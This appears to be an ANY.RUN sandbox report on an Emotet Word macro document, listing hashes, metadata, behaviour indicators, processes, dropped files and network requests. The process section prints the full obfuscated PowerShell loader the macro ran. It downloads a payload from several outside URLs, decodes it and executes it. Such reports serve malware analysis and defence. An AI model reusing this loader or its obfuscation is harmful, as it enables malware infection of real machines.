File name:

emo.doc

Full analysis: https://app.any.run/tasks/5ec77b9b-ec39-4552-81ff-b32335373205
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: July 02, 2025, 13:39:37
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
emotet-doc
emotet
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Subject: Handmade Argentina Handcrafted Frozen Towels yellow Frozen virtual Guatemala array Lesotho JBOD, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 30 23:48:00 2020, Last Saved Time/Date: Tue Nov 3 02:14:00 2020, Number of Pages: 1, Number of Words: 9339, Number of Characters: 53237, Security: 8
MD5:

3079AF4D01EE6EC51BD3D9911DA7E23F

SHA1:

3EA711D020B52FB0490C359462451D4EDD471E33

SHA256:

C578A9FC241658517A7346A2A60236C84F0BB4919B857DB226150AAB4093451E

SSDEEP:

3072:evt3BDbKRPJivKie6B/w2yiWydh+bRevf1+ll:evdlbKRPJiP/w2PCxl

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • WINWORD.EXE (PID: 6104)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2160)
  • SUSPICIOUS

    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 6104)
    • Executed via WMI

      • powershell.exe (PID: 2160)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 2160)
    • Creates a directory (POWERSHELL)

      • powershell.exe (PID: 2160)
  • INFO

    • Reads mouse settings

      • WINWORD.EXE (PID: 6104)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 2160)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 2160)
    • Reads the software policy settings

      • powershell.exe (PID: 2160)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2160)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2160)
    • Checks proxy server information

      • powershell.exe (PID: 2160)
    • Create files in a temporary directory

      • powershell.exe (PID: 2160)
    • Disables trace logs

      • powershell.exe (PID: 2160)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: 1Table, ExtChar
System: Windows
Word97: No
Title: -
Subject: Handmade Argentina Handcrafted Frozen Towels yellow Frozen virtual Guatemala array Lesotho JBOD
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
Software: Microsoft Office Word
CreateDate: 2020:10:30 23:48:00
ModifyDate: 2020:11:03 02:14:00
Security: Locked for annotations
CodePage: Windows Latin 1 (Western European)
Company: -
CharCountWithSpaces: 62452
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 1
TotalEditTime: -
Words: 9339
Characters: 53237
Pages: 1
Paragraphs: 124
Lines: 443
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
143
Monitored processes
5
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe no specs conhost.exe no specs ai.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1564\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1700"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "DC1AFB7C-6EF0-4EED-96FA-29E4A4634C25" "EF4FBC34-5E40-4EDA-8C64-50E4F5815175" "6104"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2160POwersheLL -windowstyle hidden -ENCOD   S V     0 z X   ( [ T y P e ] ( " { 2 } { 0 } { 4 } { 3 } { 1 } " - f   ' e ' , ' r E C t o r Y ' , ' s Y s t ' , ' . I O . d I ' , ' M ' )     )   ;       s e t     T x y S e o     (     [ T Y p e ] ( " { 0 } { 7 } { 5 } { 6 } { 4 } { 2 } { 1 } { 8 } { 3 } " - F ' S Y s T E ' , ' T M ' , ' I N ' , ' E R ' , ' p O ' , ' N e T . s e ' , ' R V I C E ' , ' M . ' , ' A N a G ' ) )   ;     $ N b f 5 t g 3 = ( ' B 9 ' + ' y p ' + ( ' 9 0 ' + ' s ' ) ) ; $ V x n l r e 0 = $ C l u d k j x   +   [ c h a r ] ( 6 4 )   +   $ R 6 r 1 t u y ; $ K y 3 q 0 e 8 = ( ( ' R q ' + ' d x ' ) + ' w o ' + ' 5 ' ) ;     (     D i r     v a R i A b l e : 0 Z x ) . v a l u E : : " C r e A T ` E ` d I R E c ` T ` O r Y " ( $ H O M E   +   ( ( ( ' n D p ' + ' J r b ' ) + ( ' e ' + ' v k 4 n ' ) + ' D ' + ' p ' + ( ' C ' + ' c w r _ 2 h ' ) + ' n D ' + ' p ' )   - R e P l A c E   ( ' n ' + ' D p ' ) , [ c H a R ] 9 2 ) ) ; $ F N 5 g g m s H   =   ( 1 8 2 , 1 8 7 , 2 2 9 , 1 4 6 , 2 3 1 , 1 7 7 , 1 5 1 , 1 4 9 , 1 6 6 ) ; $ P y o z g e o = ( ( ' J 5 f ' + ' y 1 ' ) + ' c ' + ' c ' ) ;   (     v a R i A B L E   T x Y S E o     ) . V a l u E : : " S e c U r I ` T Y p ` R ` O t O c ` o l "   =   ( ( ' T l ' + ' s 1 ' ) + ' 2 ' ) ; $ F N 5 g g m s H   + =   ( 1 8 6 , 1 4 1 , 2 2 8 , 1 8 2 , 1 7 7 , 1 7 1 , 2 2 9 , 2 3 6 , 2 3 9 , 2 3 9 , 2 3 9 , 2 2 8 , 1 8 1 , 1 8 2 , 1 7 1 , 2 2 9 , 2 3 4 , 2 3 9 , 2 3 9 , 2 2 8 ) ; $ H u a j g b 0 = ( ( ' J n ' + ' o ' ) + ' 5 g ' + ' a 1 ' ) ; $ B b 2 8 u m o   =   ( ( ' A l e ' + ' 7 g ' ) + ' _ 8 ' ) ; $ H s c e _ j s = ( ' K v ' + ( ' n b ' + ' o v _ ' ) ) ; $ S p k 5 1 u e = ( ( ' C ' + ' 7 x o ' ) + ' 9 g ' + ' l ' ) ; $ S c u s b k j = $ H O M E + ( ( ' 5 ' + ' t ' + ( ' f ' + ' J r b e v ' + ' k ' ) + ( ' 4 5 t f ' + ' C c ' + ' w ' ) + ' r ' + ( ' _ 2 h ' + ' 5 t f ' ) )   - r E p l A C E     ( [ C h A R ] 5 3 + [ C h A R ] 1 1 6 + [ C h A R ] 1 0 2 ) , [ C h A R ] 9 2 ) + $ B b 2 8 u m o + ( ( ' . e ' + ' x ' ) + ' e ' ) ; $ F N 5 g g m s H   + =   ( 1 8 5 , 1 7 9 , 1 9 0 , 1 8 4 , 2 2 9 , 1 5 1 , 1 3 9 , 1 5 7 , 1 6 4 , 2 3 5 , 1 7 7 , 2 3 9 , 1 7 1 , 1 8 3 , 2 3 6 , 1 4 1 , 1 2 8 , 1 8 7 , 2 3 5 , 1 3 4 , 1 2 8 , 1 5 8 , 1 7 7 , 1 7 6 , 1 3 9 ) ; $ h b m s k V 2 T = ( ( ' C ' + ' 7 x o ' ) + ' 9 g ' + ' l ' ) ; $ h b m s k V 2 T = $ H O M E + ( ( ' 5 ' + ' t ' + ( ' f ' + ' J r b e v ' + ' k ' ) + ( ' 4 5 t f ' + ' C c ' + ' w ' ) + ' r ' + ( ' _ 2 h ' + ' 5 t f ' ) )   - r E p l A C E     ( [ C h A R ] 5 3 + [ C h A R ] 1 1 6 + [ C h A R ] 1 0 2 ) , [ C h A R ] 9 2 ) + $ B b 2 8 u m o + ( ( ' . c ' + ' o ' ) + ' n f ' ) ; $ Q 1 _ y 0 5 _ = ( ' W ' + ( ' 4 ' + ' q v y ' ) + ' z 8 ' ) ; $ O d b 3 h f 3 = & ( ' n ' + ' e ' + ' w - o b j e c t ' )   N e t . W E B c l I E N t ; $ F N 5 g g m s H   + =   ( 1 8 3 , 1 5 4 , 1 7 3 , 1 2 8 , 1 7 5 , 1 5 1 , 2 3 8 , 1 4 0 , 1 8 3 , 1 6 2 , 2 2 8 , 1 7 0 , 1 7 3 , 1 7 9 , 2 2 9 ) ; $ A n b y t 1 y = ( ' h ' + ( ' t t p : ' + ' ] [ ' + ' ( s ) ] ' ) + ( ( ' w ] ' + ' [ ( ' ) ) + ( ( ' s ) ' + ' ] w ' ) ) + ( ' d a ' + ' - ' ) + ' i ' + ' n ' + ' d u ' + ( ' s ' + ' t r i a l . ' + ' h ' + ' t ' ) + ' b ] ' + ( ' [ ( s ) ] ' + ' w ' + ' j s ' ) + ( ( ' ] ' + ' [ ( ' ) ) + ( ( ' s ' + ' ) ] w 9 I d L ' + ' P ] [ ' + ' ( s ' + ' ) ] w ' + ' @ h ' ) ) + ( ' t ' + ' t p : ] ' ) + ( ' [ ( s ' + ' ) ] ' ) + ' w ' + ( ' ] ' + ' [ ( s ) ] ' ) + ( ' w d a p ' + ' r o ' + ' f e s i o n a ' + ' l . h ' ) + ' t b ' + ( ' ] [ ( s ' + ' ) ' + ' ] ' ) + ' w ' + ( ' d ' + ' a t a ' ) + ( ' 4 ] [ ( s ' + ' ) ] w h ' ) + ( ' W g W ' + ' j T ' ) + ( ' V ] ' + ' [ ' ) + ( ' ( s ) ] w @ h t t p ' + ' s : ] [ ( s ' + ' ) ] ' + ' w ' + ' ] ' ) + ' [ ' + ( ' ( s ) ' + ' ] w d a g ' + ' r a ' ) + ' n i ' + ' t ' + ( ' e g ' + ' i a ' ) + ( ' r e . h ' + ' t ' ) + ' b ] ' + ( ' [ ' + ' ( s ) ' ) + ( ' ] w w ' + ' p - a ' + ' d m ' + ' i n ] [ ( s ) ' + ' ] w t ' ) + ( ' V ] [ ' + ' ( s ' + ' ) ' ) + ( ' ] w @ ' + ' h ' ) + ' t t ' + ' p ' + ( ' : ' + ' ] [ ' ) + ( ' ( s ) ] w ] [ ' + ' ( s ' + ' ) ] w w w ' + ' w ' + ' . o u t ' + ' s ' + ' p ' ) + ( ' o k ' + ' e ' ) + ' n v ' + ' i ' + ( ' s ' + ' i o n s . ' ) + ( ' h t b ' + ' ] ' ) + ' [ ' + ( ' ( s ) ] w ' + ' w p ' + ' - i n ' ) + ( ' c l u ' + ' d ' ) + ( ' e s ] [ ( s ) ' + ' ] w a W ' + ' o ' + ' M ' ) + ( ' ] ' + ' [ ( ' + ' s ) ] w ' ) + ( ' @ ' + ' h t t p : ] ' ) + ( ' [ ( s ) ' + ' ] w ] [ ( ' + ' s ) ' ) + ( ' ] w m o ' + ' b s ' ) + ( ' o ' + ' u k . h ' ) + ( ( ' t ' + ' b ] [ ( ' ) ) + ( ( ' s ) ' + ' ] w w p - ' ) ) + ' i n ' + ' c ' + ' l ' + ( ' u d e ' + ' s ] ' + ' [ ' ) + ( ' ( s ) ] ' + ' w ' ) + ( ' U Y ' + ' 3 0 R ] ' ) + ( ' [ ( s ' + ' ) ] w ' + ' @ ' + ' h ' + ' t t p : ] [ ' ) + ( ' ( ' + ' s ) ] w ' ) + ( ' ] [ ' + ' ( s ) ' ) + ( ' ] ' + ' w b ' ) + ' i ' + ( ' g ' + ' l a u g h ' + ' s ' ) + ( ( ' . h ' + ' t ' + ' b ] [ ( s ' ) ) + ( ( ' ) ] ' ) ) + ( ' w s ' + ' m a l l p o t ' + ' a t o ' ) + ' e s ' + ( ( ' ] ' + ' [ ( s ' ) ) + ( ( ' ) ] w Y ] ' + ' [ ( s ' + ' ) ] w ' + ' @ h ' + ' t t p s : ] [ ( s ) ' ) ) + ' ] w ' + ( ' ] [ ( ' + ' s ) ] w n ' + ' g ' ) + ( ' l l ' + ' o ' ) + ( ' g i s t ' + ' i ' ) + ( ' c s . ' + ' h ' ) + ' t ' + ( ' b ] ' + ' [ ' + ' ( ' + ' s ) ] w ' ) + ' a d ' + ( ' m i ' + ' n ' ) + ' e r ' + ' ] ' + ( ' [ ( s ' + ' ) ] w ' + ' W 3 m ' ) + ' k ' + ( ( ' B ' + ' ] [ ( s ' ) ) + ( ( ' ) ' + ' ] w ' ) ) ) . " r e p ` L A c E " ( ( ' ] ' + ' [ ' + ( ' ( s ) ] ' + ' w ' ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x w ' + ' e ' ) ) [ 0 ] ) . " s P ` l I T " ( $ I v g 3 z c u   +   $ V x n l r e 0   +   $ J z a e w d y ) ; $ G c o y v l v = ( ( ' K f ' + ' _ ' ) + ( ' 9 ' + ' e t 1 ' ) ) ; f o r e a c h   ( $ A 8 i 3 k e 1   i n   $ A n b y t 1 y ) { t r y { $ O d b 3 h f 3 . " d O ` W n L O A ` d f I L e " ( $ A 8 i 3 k e 1 ,   $ S c u s b k j ) ; $ Z h c n a u x = ( ( ' E k ' + ' k ' ) + ( ' j ' + ' 4 7 t ' ) ) ; I f   ( ( & ( ' G e t - I ' + ' t e ' + ' m ' )   $ S c u s b k j ) . " L E n ` G T h "   - g e   4 5 1 9 9 )   { $ { A 8 ` I ` 3 K E 1 } . ( " { 1 } { 2 } { 0 } "   - f ' a y ' , ' T o C h a ' , ' r A r r ' ) . I n v o k e ( )   |   . ( " { 2 } { 1 } { 0 } { 3 } "   - f ' - ' , ' a c h ' , ' F o r E ' , ' O b j e c t ' )   - p r o c e s s   {   $ { F N 5 ` G G m ` S h }   + =   ( [ b y t e ] [ c h a r ] $ { _ }   - b x o r   0 x d f   )   } ;   $ F N 5 g g m s H   + =   ( 2 2 8 ) ;   $ b 0 R j e   =     [ t y p e ] ( " { 1 } { 0 } "   - F ' V e r T ' , ' C o n ' ) ;       $ B 0 R j E : : " t O ` B a S ` E 6 4 S ` T R I ` N g " ( $ { f n 5 ` g g m ` s h } )   |   . ( " { 2 } { 1 } { 0 } "   - f   ' i l e ' , ' u t - f ' , ' o ' )   $ { h B ` m S K ` V 2 T } ;   ( [ w m i c l a s s ] ( ( ' w i ' + ' n ' ) + ( ' 3 2 _ ' + ' P r o c ' + ' e ' ) + ' s ' + ' s ' ) ) . " c R ` e a T E " ( $ S c u s b k j ) ; $ G l w k i 6 a = ( ' I ' + ' m ' + ( ' t d ' + ' x v 6 ' ) ) ; b r e a k ; $ P f p b l h 1 = ( ' V s ' + ( ' l a l ' + ' c ' ) + ' u ' ) } } c a t c h { } } $ F 4 7 i e f 2 = ( ( ' B n ' + ' z i d ' ) + ' r t ' )  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5008C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6104"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\AppData\Local\Temp\emo.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
18 756
Read events
18 417
Write events
318
Delete events
21

Modification events

(PID) Process:(6104) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:0
Value:
017012000000001000B24E9A3E02000000000000000600000000000000
(PID) Process:(6104) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6104
Operation:writeName:0
Value:
0B0E106628DE42BFA3C945B798B557EBCF02EC230046B887B9A1ECEAFAED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511D82FD2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(6104) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(6104) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(6104) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(6104) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(6104) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(6104) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
(PID) Process:(6104) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ko-kr
Value:
2
(PID) Process:(6104) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:pt-br
Value:
2
Executable files
0
Suspicious files
108
Text files
50
Unknown types
11

Dropped files

PID
Process
Filename
Type
6104WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B4BB98060AA38DA05728DD38844EC666
SHA256:FEC9249223BAE5C7259692A79EF0FE7C5570A8D39E71AB60DDA239A5A3555806
6104WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Word\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.Sbinary
MD5:AED4FE31C03FB7A583A223AA64BF058D
SHA256:4F0210F8F3F152CB3D33C0527EF40FA88E3B83B25C5FCDDA422FFA1F12D15D43
6104WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF1775dc.TMPbinary
MD5:4FCB2A3EE025E4A10D21E1B154873FE2
SHA256:90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
6104WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9binary
MD5:5B759F8E744E55D0B52F3EDE1A47E22D
SHA256:65DF2A44D30136C7104B7F9209237E7E26A142D0954479F9563ED83404F12B79
2160powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ccys55bs.1cx.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6104WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$emo.docpgc
MD5:5E9622E44B21D5786843DCD044E7B735
SHA256:BE3C2A44197ACD5E0C22AE128F9200733441D3715C28B880F87E8381C49E80FB
6104WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\32JN7IHYA8CNA92024CE.tempbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
2160powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_30rjdd1l.j1v.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2160powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:FEB2F4F4080C220274115A95B79A3A34
SHA256:E81F9285FC40BFEADA57E9148D849179807C72268FE9B99A5B454D86A20FE840
6104WINWORD.EXEC:\Users\admin\AppData\Local\Temp\cab91F0.tmpcompressed
MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
SHA256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
60
DNS requests
30
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6104
WINWORD.EXE
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
6284
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6104
WINWORD.EXE
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
unknown
whitelisted
6104
WINWORD.EXE
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
unknown
whitelisted
6104
WINWORD.EXE
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6104
WINWORD.EXE
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl
unknown
whitelisted
6104
WINWORD.EXE
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
unknown
whitelisted
6104
WINWORD.EXE
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5944
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
1268
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3588
RUXIMICS.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6104
WINWORD.EXE
52.109.32.97:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
6104
WINWORD.EXE
52.123.129.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6104
WINWORD.EXE
2.16.168.119:443
omex.cdn.office.net
Akamai International B.V.
RU
whitelisted
4
System
192.168.100.255:138
whitelisted
6104
WINWORD.EXE
52.111.232.11:443
messaging.lifecycle.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
JP
whitelisted
1268
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
google.com
  • 216.58.212.142
whitelisted
officeclient.microsoft.com
  • 52.109.32.97
whitelisted
ecs.office.com
  • 52.123.129.14
  • 52.123.128.14
whitelisted
omex.cdn.office.net
  • 2.16.168.119
  • 2.16.168.101
whitelisted
messaging.lifecycle.office.com
  • 52.111.232.11
whitelisted
da-industrial.htb
unknown
daprofesional.htb
unknown
dagranitegiare.htb
unknown
www.outspokenvisions.htb
whitelisted

Threats

No threats detected
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.